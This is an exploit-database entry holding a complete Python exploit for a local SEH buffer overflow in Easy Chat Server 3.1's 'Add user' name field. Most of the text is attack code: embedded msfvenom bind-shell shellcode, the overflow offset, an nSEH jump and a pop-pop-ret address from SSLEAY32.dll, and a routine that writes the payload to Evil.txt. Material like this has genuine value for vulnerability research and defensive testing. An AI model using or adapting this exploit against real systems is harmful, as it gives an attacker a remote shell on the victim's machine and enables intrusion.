Easy Chat Server 3.1 Add User Local Buffer Overflow Exploit

2018-06-15T00:00:00
ID 1337DAY-ID-30588
Type zdt
Reporter Hashim Jawad
Modified 2018-06-15T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            #!/usr/bin/env python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title      : Easy Chat Server 3.1 - 'Add user' Local Buffer Overflow                             #
# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #
# Vendor Homepage    : http://www.echatserver.com/index.htm                                                #
# Vulnerable Software: http://www.echatserver.com/ecssetup.exe                                             #
# Tested on          : Windows 7 Enterprise SP1 (x64)                                                      #
# Steps to reproduce : paste contents of Evil.txt in 'Name:' field under Add user and click OK             #
#----------------------------------------------------------------------------------------------------------#

# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed -f python -v shellcode 
# Payload size: 718 bytes
shellcode =  ""
shellcode += "\x89\xe3\xda\xd3\xd9\x73\xf4\x5e\x56\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x79\x6c\x6a\x48\x6b\x32\x53\x30\x73\x30\x77\x70"
shellcode += "\x43\x50\x4e\x69\x7a\x45\x36\x51\x79\x50\x61\x74"
shellcode += "\x4e\x6b\x52\x70\x76\x50\x6e\x6b\x62\x72\x44\x4c"
shellcode += "\x4c\x4b\x51\x42\x72\x34\x4c\x4b\x71\x62\x66\x48"
shellcode += "\x76\x6f\x4d\x67\x63\x7a\x45\x76\x50\x31\x4b\x4f"
shellcode += "\x6c\x6c\x65\x6c\x75\x31\x63\x4c\x77\x72\x44\x6c"
shellcode += "\x35\x70\x4a\x61\x68\x4f\x74\x4d\x63\x31\x5a\x67"
shellcode += "\x69\x72\x5a\x52\x76\x32\x46\x37\x6e\x6b\x52\x72"
shellcode += "\x44\x50\x6e\x6b\x30\x4a\x75\x6c\x6e\x6b\x62\x6c"
shellcode += "\x66\x71\x73\x48\x68\x63\x77\x38\x67\x71\x58\x51"
shellcode += "\x66\x31\x6c\x4b\x31\x49\x31\x30\x46\x61\x59\x43"
shellcode += "\x6c\x4b\x37\x39\x56\x78\x7a\x43\x45\x6a\x50\x49"
shellcode += "\x4c\x4b\x74\x74\x6e\x6b\x53\x31\x6a\x76\x66\x51"
shellcode += "\x69\x6f\x6e\x4c\x59\x51\x4a\x6f\x44\x4d\x76\x61"
shellcode += "\x6a\x67\x64\x78\x6b\x50\x70\x75\x4a\x56\x44\x43"
shellcode += "\x63\x4d\x48\x78\x77\x4b\x51\x6d\x67\x54\x52\x55"
shellcode += "\x59\x74\x70\x58\x4e\x6b\x66\x38\x65\x74\x55\x51"
shellcode += "\x68\x53\x63\x56\x6e\x6b\x56\x6c\x70\x4b\x4e\x6b"
shellcode += "\x52\x78\x45\x4c\x35\x51\x38\x53\x6c\x4b\x56\x64"
shellcode += "\x6c\x4b\x67\x71\x4a\x70\x6f\x79\x73\x74\x71\x34"
shellcode += "\x45\x74\x73\x6b\x43\x6b\x31\x71\x73\x69\x51\x4a"
shellcode += "\x70\x51\x59\x6f\x4d\x30\x51\x4f\x73\x6f\x33\x6a"
shellcode += "\x4e\x6b\x36\x72\x58\x6b\x6c\x4d\x33\x6d\x31\x78"
shellcode += "\x70\x33\x57\x42\x47\x70\x43\x30\x35\x38\x30\x77"
shellcode += "\x33\x43\x46\x52\x53\x6f\x36\x34\x61\x78\x42\x6c"
shellcode += "\x63\x47\x54\x66\x36\x67\x59\x6f\x58\x55\x6d\x68"
shellcode += "\x4e\x70\x53\x31\x55\x50\x77\x70\x35\x79\x7a\x64"
shellcode += "\x50\x54\x30\x50\x65\x38\x55\x79\x6b\x30\x62\x4b"
shellcode += "\x53\x30\x39\x6f\x5a\x75\x43\x5a\x33\x38\x66\x39"
shellcode += "\x52\x70\x79\x72\x59\x6d\x51\x50\x76\x30\x51\x50"
shellcode += "\x66\x30\x35\x38\x79\x7a\x66\x6f\x69\x4f\x59\x70"
shellcode += "\x39\x6f\x79\x45\x6f\x67\x35\x38\x66\x62\x63\x30"
shellcode += "\x54\x51\x71\x4c\x4d\x59\x49\x76\x52\x4a\x56\x70"
shellcode += "\x66\x36\x76\x37\x33\x58\x78\x42\x6b\x6b\x56\x57"
shellcode += "\x55\x37\x69\x6f\x79\x45\x31\x47\x33\x58\x68\x37"
shellcode += "\x79\x79\x34\x78\x4b\x4f\x4b\x4f\x49\x45\x46\x37"
shellcode += "\x35\x38\x61\x64\x38\x6c\x57\x4b\x69\x71\x69\x6f"
shellcode += "\x4b\x65\x42\x77\x4f\x67\x33\x58\x44\x35\x32\x4e"
shellcode += "\x32\x6d\x55\x31\x59\x6f\x78\x55\x65\x38\x30\x63"
shellcode += "\x52\x4d\x42\x44\x57\x70\x4b\x39\x79\x73\x63\x67"
shellcode += "\x33\x67\x30\x57\x36\x51\x59\x66\x73\x5a\x46\x72"
shellcode += "\x43\x69\x50\x56\x49\x72\x79\x6d\x51\x76\x58\x47"
shellcode += "\x33\x74\x67\x54\x47\x4c\x76\x61\x66\x61\x4c\x4d"
shellcode += "\x57\x34\x54\x64\x62\x30\x78\x46\x77\x70\x33\x74"
shellcode += "\x70\x54\x42\x70\x70\x56\x73\x66\x30\x56\x42\x66"
shellcode += "\x32\x76\x50\x4e\x61\x46\x63\x66\x52\x73\x42\x76"
shellcode += "\x61\x78\x63\x49\x78\x4c\x75\x6f\x4e\x66\x6b\x4f"
shellcode += "\x4e\x35\x4f\x79\x69\x70\x52\x6e\x70\x56\x43\x76"
shellcode += "\x69\x6f\x64\x70\x35\x38\x75\x58\x6b\x37\x45\x4d"
shellcode += "\x33\x50\x69\x6f\x5a\x75\x6f\x4b\x7a\x50\x58\x35"
shellcode += "\x6d\x72\x33\x66\x71\x78\x6d\x76\x6f\x65\x4f\x4d"
shellcode += "\x6d\x4d\x69\x6f\x4b\x65\x35\x6c\x35\x56\x73\x4c"
shellcode += "\x64\x4a\x6d\x50\x6b\x4b\x69\x70\x70\x75\x67\x75"
shellcode += "\x6d\x6b\x77\x37\x36\x73\x42\x52\x32\x4f\x51\x7a"
shellcode += "\x77\x70\x32\x73\x39\x6f\x6b\x65\x41\x41"

buffer  = '\xcc' * 217                              # offset to nSEH
buffer += '\x75\x06\x74\x06'                        # nSEH | jump net
buffer += '\x21\x7f\x01\x10'                        # SEH  | 0x10017f21 : pop esi # pop ecx # ret  | [SSLEAY32.dll] 
buffer += '\x90' * 10                               # nop sled
buffer += shellcode                                 # bind shell 
buffer += '\xcc' * (5000-217-4-4-10-len(shellcode)) # junk

try:
  f=open("Evil.txt","w")
  print "[+] Creating %s bytes evil payload.." %len(buffer)
  f.write(buffer)
  f.close()
  print "[+] File created!"
except Exception as e:
  print e

#  0day.today [2018-06-15]  #